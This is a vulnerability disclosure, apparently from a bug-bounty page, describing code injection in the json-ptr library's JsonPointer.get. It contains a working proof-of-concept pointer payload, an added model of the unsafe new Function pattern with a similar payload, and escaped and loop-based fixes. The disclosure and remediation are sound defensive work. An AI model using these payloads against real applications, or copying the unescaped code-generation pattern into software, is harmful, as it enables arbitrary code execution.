Code Injection in flitbit/json-ptr

Valid

Reported on Mar 28th 2021

✍️ Description

json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

JsonPointer.get(target, pointer) returns the value found at the pointer's location in target. To do so, json-ptr compiles the pointer into an accessor function by assembling the accessor's JavaScript source as a string and passing it to new Function. The pointer's reference tokens are interpolated into that source without adequate escaping, so a pointer that an attacker controls can close the generated string literal and the surrounding if statement, append arbitrary statements, and then re-open matching syntax so the rest of the template still parses. The injected code runs as soon as the pointer is evaluated.

🕵️‍♂️ Proof of Concept

// PoC.js
const jptr = require('json-ptr');
const JsonPointer = jptr.JsonPointer;
// The single reference token closes the generated it['...'] literal and its if,
// injects console.log, then re-opens parentheses so the tail of the template parses.
JsonPointer.get({}, '/aaa\'\]\)\) !== \'undefined\') \{return it;\}; console.log(\'HACKED\'); if((([\'a'); // HACKED

💥 Impact

Any JavaScript placed in the pointer runs with the full privileges of the Node.js process (or browser page) that evaluates it, so an application that passes untrusted pointers to JsonPointer.get is exposed to arbitrary code execution.
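To make the mechanism concrete, the following is an added example and not json-ptr's own source or the fix its maintainers shipped: a minimal model of the "compile the pointer into an accessor with new Function" pattern with an unescaped token, beside two hardened variants (one that still generates code but emits the key through JSON.stringify, and one that walks the segments in a plain loop with no code generation). The template string, the function names, the globalThis.__pocMarker flag and the payload are all constructed for illustration; the payload has the same shape as the proof-of-concept pointer above but sets a marker and returns a sentinel instead of calling console.log.

```javascript
// Added example, not json-ptr's code. Models the "compile a JSON Pointer into
// an accessor via new Function" pattern, shows why unescaped interpolation is a
// code-injection sink, and gives two safe alternatives.

// RFC 6901 decoding: drop the leading "/", split on "/", then unescape
// "~1" -> "/" before "~0" -> "~" (the order matters).
function decodePointer(pointer) {
  if (pointer === '') return [];
  if (pointer[0] !== '/') throw new Error('JSON Pointer must be empty or start with "/"');
  return pointer
    .slice(1)
    .split('/')
    .map((tok) => tok.replace(/~1/g, '/').replace(/~0/g, '~'));
}

// VULNERABLE (model of the pre-fix pattern): each reference token is pasted
// verbatim into the generated source between single quotes.
function compileUnsafe(segments) {
  let body = "if (typeof(it) !== 'undefined'";
  for (const seg of segments) {
    body += " && typeof((it = it['" + seg + "'])) !== 'undefined'";
  }
  body += ') { return it; }';
  // eslint-disable-next-line no-new-func
  return new Function('it', body);
}

// HARDENED, option A: still generates code, but emits the key as a JSON string
// literal. JSON.stringify escapes quotes and backslashes, so a token can never
// terminate the literal; it is only ever a property name.
function compileEscaped(segments) {
  let body = "if (typeof(it) !== 'undefined'";
  for (const seg of segments) {
    body += ' && typeof((it = it[' + JSON.stringify(String(seg)) + "])) !== 'undefined'";
  }
  body += ') { return it; }';
  // eslint-disable-next-line no-new-func
  return new Function('it', body);
}

// HARDENED, option B (preferred): no code generation at all. Walk the segments
// in a loop, stop at null or primitives, and follow own properties only, so
// tokens such as "__proto__" or "constructor" cannot climb the prototype chain
// (an extra guard beyond the injection issue itself).
function derefSafe(target, segments) {
  let it = target;
  for (const seg of segments) {
    if (it === null || (typeof it !== 'object' && typeof it !== 'function')) return undefined;
    if (!Object.prototype.hasOwnProperty.call(it, seg)) return undefined;
    it = it[seg];
  }
  return it;
}

// Constructed payload with the same shape as the PoC pointer above: the token
// closes the generated string and its `if`, injects statements, then re-opens
// matching parentheses so the remainder of the template still parses. Instead
// of console.log it sets a global marker and returns a sentinel value.
const INJECTED_TOKEN =
  "aaa'])) !== 'undefined') { return it; } " +
  "globalThis.__pocMarker = 'HACKED'; return 'HACKED'; " +
  "if(((['a";

// Runs the three variants against an empty object and reports what each did.
function demo() {
  delete globalThis.__pocMarker;
  const unsafe = compileUnsafe([INJECTED_TOKEN])({});
  const unsafeMarker = globalThis.__pocMarker;
  delete globalThis.__pocMarker;
  const escaped = compileEscaped([INJECTED_TOKEN])({});
  const walked = derefSafe({}, [INJECTED_TOKEN]);
  return { unsafe, unsafeMarker, escaped, walked, markerAfterSafe: globalThis.__pocMarker };
}

console.log(demo());
// Expected: { unsafe: 'HACKED', unsafeMarker: 'HACKED', escaped: undefined, walked: undefined, markerAfterSafe: undefined }
```

Option A shows that the bug is an escaping failure in a code-generation template, not anything specific to RFC 6901; option B removes the sink entirely, which is the design a reviewer should push for whenever user input reaches new Function or eval, since any escaping scheme has to be right for every character class, whereas a property lookup has nothing to get wrong.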

Occurrences

Jamie Slome (Admin), 2 years ago

Validation should be working now - apologies for any issues!

Phillip Clark, 2 years ago

For reference: fixed in v2.1.0 and above.
